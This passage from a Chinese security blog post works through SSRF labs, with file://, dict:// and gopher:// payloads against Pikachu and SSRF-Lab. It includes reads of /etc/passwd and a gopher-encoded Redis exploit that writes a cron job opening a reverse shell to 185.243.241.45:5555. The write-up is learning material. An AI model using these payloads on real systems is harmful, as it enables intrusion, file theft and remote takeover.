class="hljs-title">fa</span> <span class="hljs-title">fa</span>-<span class="hljs-title">home</span> <span class="hljs-title">home</span>-<span class="hljs-title">icon</span>&quot;&gt;&lt;/<span class="hljs-title">i</span>&gt;</span><br><span class="hljs-class">                    &lt;<span class="hljs-title">a</span> <span class="hljs-title">href</span>=&quot;<span class="hljs-title">ssrf</span>.<span class="hljs-title">php</span>&quot;&gt;&lt;/<span class="hljs-title">a</span>&gt;</span><br><span class="hljs-class">                &lt;/<span class="hljs-title">li</span>&gt;</span><br><span class="hljs-class">                &lt;<span class="hljs-title">li</span> <span class="hljs-title">class</span>=&quot;<span class="hljs-title">active</span>&quot;&gt;概述&lt;/<span class="hljs-title">li</span>&gt;</span><br><span class="hljs-class">            &lt;/<span class="hljs-title">ul</span>&gt;</span><br><span class="hljs-class">        &lt;/<span class="hljs-title">div</span>&gt;</span><br><span class="hljs-class">        &lt;<span class="hljs-title">div</span> <span class="hljs-title">class</span>=&quot;<span class="hljs-title">page</span>-<span class="hljs-title">content</span>&quot;&gt;</span><br><span class="hljs-class"></span><br><span class="hljs-class">         &lt;<span class="hljs-title">b</span>&gt;<span class="hljs-title">SSRF</span>(<span class="hljs-title">Server</span>-<span class="hljs-title">Side</span> <span class="hljs-title">Request</span> <span class="hljs-title">Forgery</span>:服务器端请求伪造)&lt;/<span class="hljs-title">b</span>&gt;</span><br><span class="hljs-class">         &lt;<span class="hljs-title">p</span>&gt;其形成的原因大都是由于服务端&lt;<span class="hljs-title">b</span>&gt;提供了从其他服务器应用获取数据的功能&lt;/<span class="hljs-title">b</span>&gt;,但又没有对目标地址做严格过滤与限制&lt;/<span class="hljs-title">p</span>&gt;</span><br><span class="hljs-class">            导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据&lt;<span class="hljs-title">br</span>&gt;</span><br><span class="hljs-class">            &lt;<span class="hljs-title">br</span>&gt;</span><br><span class="hljs-class">            数据流:攻击者-----&gt;服务器----&gt;目标地址&lt;<span class="hljs-title">br</span>&gt;</span><br><span class="hljs-class">            &lt;<span class="hljs-title">br</span>&gt;</span><br><span class="hljs-class">            根据后台使用的函数的不同,对应的影响和利用方法又有不一样</span><br><span class="hljs-class">            &lt;<span class="hljs-title">pre</span> <span class="hljs-title">style</span>=&quot;<span class="hljs-title">width</span>: 500<span class="hljs-title">px</span>;&quot;&gt;</span><br><span class="hljs-class"><span class="hljs-title">PHP</span>中下面函数的使用不当会导致<span class="hljs-title">SSRF</span>:</span><br><span class="hljs-class"><span class="hljs-title">file_get_contents</span>()</span><br><span class="hljs-class"><span class="hljs-title">fsockopen</span>()</span><br><span class="hljs-class"><span class="hljs-title">curl_exec</span>()</span><br><span class="hljs-class">            &lt;/<span class="hljs-title">pre</span>&gt;&lt;<span class="hljs-title">br</span>&gt;</span><br><span class="hljs-class">            如果一定要通过后台服务器远程去对用户指定(&quot;或者预埋在前端的请求&quot;)的地址进行资源请求,&lt;<span class="hljs-title">b</span>&gt;则请做好目标地址的过滤&lt;/<span class="hljs-title">b</span>&gt;。</span><br><span class="hljs-class">&lt;<span class="hljs-title">br</span>&gt;</span><br><span class="hljs-class">            &lt;<span class="hljs-title">br</span>&gt;</span><br><span class="hljs-class"></span><br><span class="hljs-class">            你可以根据&quot;<span class="hljs-title">SSRF</span>&quot;里面的项目来搞懂问题的原因</span><br><span class="hljs-class"></span><br><span class="hljs-class">        &lt;/<span class="hljs-title">div</span>&gt;&lt;!-- /.<span class="hljs-title">page</span>-<span class="hljs-title">content</span> --&gt;</span><br><span class="hljs-class">    &lt;/<span class="hljs-title">div</span>&gt;</span><br><span class="hljs-class">&lt;/<span class="hljs-title">div</span>&gt;&lt;!-- /.<span class="hljs-title">main</span>-<span class="hljs-title">content</span> --&gt;</span><br><span class="hljs-class"></span><br><span class="hljs-class"></span><br><span class="hljs-class"></span><br><span class="hljs-class">&lt;?<span class="hljs-title">php</span></span><br><span class="hljs-class"><span class="hljs-title">include_once</span> $<span class="hljs-title">PIKA_ROOT_DIR</span> . &#x27;<span class="hljs-title">footer</span>.<span class="hljs-title">php</span>&#x27;;</span><br><span class="hljs-class"></span><br><span class="hljs-class">?&gt;</span><br></code></pre></td></tr></table></figure>
<p><strong>读取本地host等文件</strong></p>
<p><code>http://localhost:8080/pikachu-master/vul/ssrf/ssrf_fgc.php?file=file://c:\windows\system32\drivers\etc\hosts</code></p>
<p class='item-img' data-src='image-20230619162056352.png'><img src="image-20230619162056352.png" alt="image-20230619162056352"></p>
<h3 id="3-SSRF-lab实战"><a href="#3-SSRF-lab实战" class="headerlink" title="3-SSRF-lab实战"></a>3. SSRF-lab实战</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">可利用的主要就几个协议吧<br><br>file 协议结合目录遍历读取文件。<br><br>gopher 协议打开端口。<br><br>dict 协议主要用于结合 curl 攻击。<br><br>http 协议进行内网探测。<br></code></pre></td></tr></table></figure>
<p>SSRF-Lab 搭建教程：<a target="_blank" rel="noopener" href="https://drun1baby.top/2022/05/16/SSRF-Lab%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/">https://drun1baby.top/2022/05/16/SSRF-Lab环境搭建/</a></p>
<h4 id="3-1-file协议利用"><a href="#3-1-file协议利用" class="headerlink" title="3-1-file协议利用"></a>3.1 file协议利用</h4>
<p>使用 file 协议进行的<strong>任意文件读取</strong>算是 ssrf 最简单的利用方式了</p>
<p>首先先写一段有 ssrf 漏洞的代码，命名为 ssrf.php 并部署到服务器上。</p>
<p class='item-img' data-src='image-20230619195032903.png'><img src="image-20230619195032903.png" alt="image-20230619195032903"></p>
<p>用 file 协议简单测试一下，可以看到能成功利用 ssrf 漏洞读取文件。file 协议的格式为：<strong>file:// 文件路径</strong></p>
<p>这里不知道为什么我的服务器读取不到内网文件，先借用佬的图片了</p>
<p class='item-img' data-src='image-20230619195043962.png'><img src="image-20230619195043962.png" alt="image-20230619195043962"></p>
<p>Payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">file:///etc/passwd  # file:// 之后可以接任意文件<br></code></pre></td></tr></table></figure>
<p>这里的 Payload 只是一个基础示范，还可以读取很多文件，在实战渗透当中，更多情况应该是通过 GET 请求攻击的。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">http://ip/index.php?url=file:///etc/passwd<br></code></pre></td></tr></table></figure>
<p>而在 SSRF-Lab 当中较简单，在框中输入<code>file:///etc/passwd</code>即可。</p>
<p class='item-img' data-src='image-20230619192555400.png'><img src="image-20230619192555400.png" alt="image-20230619192555400"></p>
<p>除此之外，利用这个协议可以读取主机内任意文件。接下来可以读取配置文件和源代码方便进一步的渗透，这里之所以成功实现是因为URL没有经过严格的过滤，所以才可以利用这个协议进行任意文件读取。</p>
<h4 id="3-2-http协议研究"><a href="#3-2-http协议研究" class="headerlink" title="3-2-http协议研究"></a>3.2 http协议研究</h4>
<p>http 协议的利用也很简单，就是向目标发送 http 请求，由于 get 请求的参数是直接加在 url 里的，所以可以探测内网那些使用 get 请求即可攻击的应用。</p>
<p class='item-img' data-src='image-20230619211811712.png'><img src="image-20230619211811712.png" alt="image-20230619211811712"></p>
<p>使用 nc 可以接收到发送的 http 数据包，结构非常简单。</p>
<p class='item-img' data-src='image-20230619212013684.png'><img src="image-20230619212013684.png" alt="image-20230619212013684"></p>
<p class='item-img' data-src='image-20230619211959277.png'><img src="image-20230619211959277.png" alt="image-20230619211959277"></p>
<h4 id="3-3-dict-协议的使用"><a href="#3-3-dict-协议的使用" class="headerlink" title="3-3-dict-协议的使用"></a>3.3 dict 协议的使用</h4>
<p>利用<code>dict</code>协议，<code>dict://ip/info</code>可获取本地<code>redis</code>服务配置信息。</p>
<p>如果在靶场当中要尝试 dict 协议读取 Redis 需要先安装一下 redis-server，具体可见 <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7333#toc-4">redis 与 dict 协议</a></p>
<p>在上面还介绍过<code>redis</code>服务，看了很多<code>SSRF</code> 协议中的利用都是结合 Redis 服务的，所以这里就先在<code>ssrf-basics</code> 容器里面安装该服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">$ docker ps #查看容器编号<br>$ docker exec -it 容器编号 /bin/bash #进入容器<br>$ apt-get install redis-server # 安装redis服务<br>$ redis-server #开启redis服务<br></code></pre></td></tr></table></figure>
<p class='item-img' data-src='image-20230619193110302.png'><img src="image-20230619193110302.png" alt="image-20230619193110302"></p>
<p>安装好之后，便可以利用协议收集信息及反弹 shell</p>
<p>利用<code>dict</code>协议，<code>dict://127.0.0.1:6379/info</code>可获取本地<code>redis</code>服务配置信息</p>
<p>这里大概是因为6379是其默认端口</p>
<p class='item-img' data-src='image-20230619193202154.png'><img src="image-20230619193202154.png" alt="image-20230619193202154"></p>
<p>用 nc 在测试机监听，然后利用 ssrf 漏洞测试一下 dict 协议发送字符串 info，看看接收方会收到什么：</p>
<p class='item-img' data-src='image-20230619212148135.png'><img src="image-20230619212148135.png" alt="image-20230619212148135"></p>
<p class='item-img' data-src='image-20230619212155507.png'><img src="image-20230619212155507.png" alt="image-20230619212155507"></p>
<p>可以看到一共收到了三行数据，第一行是版本号，第二行是我们发送的数据，第三行是自动添加的 QUIT。</p>
<p>dict 协议不支持换行符，没有办法进行换行，相当于一次只能执行一条命令，所以不能用来攻击那些需要交互的应用（比如需要认证的 redis）。</p>
<p class='item-img' data-src='image-20230619212234834.png'><img src="image-20230619212234834.png" alt="image-20230619212234834"></p>
<h4 id="3-4-gopher-协议的使用"><a href="#3-4-gopher-协议的使用" class="headerlink" title="3-4-gopher-协议的使用"></a>3.4 gopher 协议的使用</h4>
<p>首先先了解一下通常攻击 Redis 的命令，然后转化为 Gopher 可用的协议</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">redis-cli -h $1 flushall<br>echo -e &quot;\n\n*/1 * * * * bash -i &gt;&amp; /dev/tcp/127.0.0.1/45952 0&gt;&amp;1\n\n&quot;|redis-cli -h $1 -x set 1<br>redis-cli -h $1 config set dir /var/spool/cron/<br>redis-cli -h $1 config set dbfilename root<br>redis-cli -h $1 save<br>//redis-cli查看所有的keys及清空所有的数据<br></code></pre></td></tr></table></figure>
<p>这便是常见的exp，只需自己更改IP和端口即可，改成适配于<code>Gopher</code>协议的 URL：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i &gt;&amp; /dev/tcp/185.243.241.45/5555 0&gt;&amp;1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a<br></code></pre></td></tr></table></figure>
<p>经过url解码便是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">gopher://127.0.0.1:6379/_*1 $8 flushall *3 $3 set $1 1 $64 */1 * * * * bash -i &gt;&amp; /dev/tcp/185.243.241.45/5555 0&gt;&amp;1 *4 $6 config $3 set $3 dir $16 /var/spool/cron/ *4 $6 config $3 set $10 dbfilename $4 root *1 $4 save quit<br></code></pre></td></tr></table></figure>
<p>进行测试，成功回显</p>
<p class='item-img' data-src='image-20230619194631514.png'><img src="image-20230619194631514.png" alt="image-20230619194631514"></p>
<p>接下来在 <code>ssrf-lab/basics</code> 容器里面查看插入的 KEY 值，验证是否成功</p>
<p class='item-img' data-src='image-20230619194934118.png'><img src="image-20230619194934118.png" alt="image-20230619194934118"></p>
<p>利用<code>Gopher</code> 协议还可以攻击 <code>FastCGI</code>，攻击内网 <code>Vulnerability Web</code></p>
<p>高级文章：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/9554#toc-10">https://xz.aliyun.com/t/9554#toc-10</a></p>
<p>需要发送多行数据时，就要用到 gopher 协议，同样使用 nc 简单测试一下，可以看到接收端成功接收到了换行的数据，所以 <strong>gopher 协议可以用来攻击那些需要交互的应用。</strong></p>
<p>至于这个 _ 符号暂时不知道为何要+，下面结论有解释</p>
<p class='item-img' data-src='image-20230619212628432.png'><img src="image-20230619212628432.png" alt="image-20230619212628432"></p>
<p class='item-img' data-src='image-20230619212621837.png'><img src="image-20230619212621837.png" alt="image-20230619212621837"></p>
<p>结论：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">1、gopher 协议会吃掉第一个字符，所以要先放一个没有用的字符<br><br>2、回车是 \r\n，但如果直接对 \r\n 进行 url 编码结果是不对的，因为编码的是 \ r \ n 四个字符的结果，实际回车只是两个不可见的字符，url 编码为 %0d%0a<br><br>3、直接发 % 可以正常接收，但是发 %0d%0a 就会出现数据包发不出去的问题，还需要进行一次 url 编码成 %250d%250a 才能正常发送出去（直接用 curl 命令测试没这个问题，应该是 web 服务器会自动进行一次 url 解码导致的）<br></code></pre></td></tr></table></figure>
<h4 id="3-5-Weblogic-SSRF漏洞"><a href="#3-5-Weblogic-SSRF漏洞" class="headerlink" title="3-5-Weblogic-SSRF漏洞"></a>3.5 Weblogic SSRF漏洞</h4>
<p>参考：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7333#toc-5">https://xz.aliyun.com/t/7333#toc-5</a></p>
<h4 id="3-6-更多攻击对象"><a href="#3-6-更多攻击对象" class="headerlink" title="3-6-更多攻击对象"></a>3.6 更多攻击对象</h4>
<p>参考：<a target="_blank" rel="noopener" href="https://blog.chaitin.cn/gopher-attack-surfaces/">https://blog.chaitin.cn/gopher-attack-surfaces/</a></p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages" style="justify-content: flex-start"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2023/07/26/CORS%E8%B7%A8%E5%9F%9F%E6%BC%8F%E6%B4%9E/">← Next CORS跨域漏洞</a></div></div></div><div id="comments"><div id="waline"></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧</a><a class="i-index" id="to-index" href="#toc-div" title="To Catalog">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/">hybcx</a></h1><div id="description"><p></p></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text">ssrf漏洞总结</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81SSRF%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.1.</span> <span class="toc-text">一、SSRF是什么？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81SSRF%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="toc-number">1.2.</span> <span class="toc-text">二、SSRF漏洞原理</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E5%86%85%E7%BD%91%E8%AE%BF%E9%97%AE"><span class="toc-number">1.2.0.1.</span> <span class="toc-text">什么是内网访问</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E7%AB%AF%E5%8F%A3%E6%98%A0%E5%B0%84"><span class="toc-number">1.2.0.2.</span> <span class="toc-text">什么是端口映射</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98"><span class="toc-number">1.3.</span> <span class="toc-text">三、漏洞挖掘</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8D%B1%E5%AE%B3%E4%B8%8E%E5%88%A9%E7%94%A8%EF%BC%9A"><span class="toc-number">1.3.1.</span> <span class="toc-text">危害与利用：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%9C%BA%E6%99%AF%EF%BC%9A"><span class="toc-number">1.3.2.</span> <span class="toc-text">漏洞场景：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7"><span class="toc-number">1.3.2.1.</span> <span class="toc-text">利用技巧</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B%E3%80%81%E4%BA%A7%E7%94%9FSSRF%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%87%BD%E6%95%B0"><span class="toc-number">1.4.</span> <span class="toc-text">四、产生SSRF漏洞的函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%94%E3%80%81SSRF%E4%B8%ADURL%E7%9A%84%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="toc-number">1.5.</span> <span class="toc-text">五、SSRF中URL的伪协议</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#5-1-file"><span class="toc-number">1.5.1.</span> <span class="toc-text">5.1 file</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-2-dict"><span class="toc-number">1.5.2.</span> <span class="toc-text">5.2 dict</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-3-sftp"><span class="toc-number">1.5.3.</span> <span class="toc-text">5.3 sftp</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-4-ldap-%E6%88%96ldaps-%E6%88%96ldapi"><span class="toc-number">1.5.4.</span> <span class="toc-text">5.4 ldap:&#x2F;&#x2F;或ldaps:&#x2F;&#x2F; 或ldapi:&#x2F;&#x2F;</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-5-tftp"><span class="toc-number">1.5.5.</span> <span class="toc-text">5.5 tftp:&#x2F;&#x2F;</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-6-gopher"><span class="toc-number">1.5.6.</span> <span class="toc-text">5.6 gopher:&#x2F;&#x2F;</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%AD%E3%80%81SSRF%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%EF%BC%88%E5%8D%B1%E5%AE%B3%EF%BC%89"><span class="toc-number">1.6.</span> <span class="toc-text">六、SSRF漏洞利用（危害）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%83%E3%80%81%E6%BC%8F%E6%B4%9E%E7%9A%84%E9%AA%8C%E8%AF%81%EF%BC%9A"><span class="toc-number">1.7.</span> <span class="toc-text">七、漏洞的验证：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%AB%E3%80%81%E5%88%A9%E7%94%A8%E6%AD%A5%E9%AA%A4"><span class="toc-number">1.8.</span> <span class="toc-text">八、利用步骤</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B9%9D%E3%80%81%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F"><span class="toc-number">1.9.</span> <span class="toc-text">九、绕过方式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%81%E3%80%81SSRF%E6%BC%8F%E9%98%B2%E5%BE%A1"><span class="toc-number">1.10.</span> <span class="toc-text">十、SSRF漏防御</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%81%E4%B8%80%E3%80%81%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98"><span class="toc-number">1.11.</span> <span class="toc-text">十一、靶场实战</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-SSRF-curl"><span class="toc-number">1.11.1.</span> <span class="toc-text">1. SSRF-curl</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-SSRF-file-get-contents"><span class="toc-number">1.11.2.</span> <span class="toc-text">2. SSRF-file_get_contents</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-SSRF-lab%E5%AE%9E%E6%88%98"><span class="toc-number">1.11.3.</span> <span class="toc-text">3. SSRF-lab实战</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#3-1-file%E5%8D%8F%E8%AE%AE%E5%88%A9%E7%94%A8"><span class="toc-number">1.11.3.1.</span> <span class="toc-text">3.1 file协议利用</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-2-http%E5%8D%8F%E8%AE%AE%E7%A0%94%E7%A9%B6"><span class="toc-number">1.11.3.2.</span> <span class="toc-text">3.2 http协议研究</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-3-dict-%E5%8D%8F%E8%AE%AE%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="toc-number">1.11.3.3.</span> <span class="toc-text">3.3 dict 协议的使用</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-4-gopher-%E5%8D%8F%E8%AE%AE%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="toc-number">1.11.3.4.</span> <span class="toc-text">3.4 gopher 协议的使用</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-5-Weblogic-SSRF%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.11.3.5.</span> <span class="toc-text">3.5 Weblogic SSRF漏洞</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-6-%E6%9B%B4%E5%A4%9A%E6%94%BB%E5%87%BB%E5%AF%B9%E8%B1%A1"><span class="toc-number">1.11.3.6.</span> <span class="toc-text">3.6 更多攻击对象</span></a></li></ol></li></ol></li></ol></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr>by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside><div id="shadow-aside"></div></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script type="module">import { init } from 'https://unpkg.com/@waline/client@v2/dist/waline.mjs';
window.waline = init;
</script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {if (document.querySelector('#waline'))
 waline({
   el: '#waline',
   dark: ':root[theme-mode="dark"]',
   serverURL: 'https://waline-blog-iwqdtxise-hybchenxing.vercel.app',
   path: window.location.pathname,
 });document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script></body></html>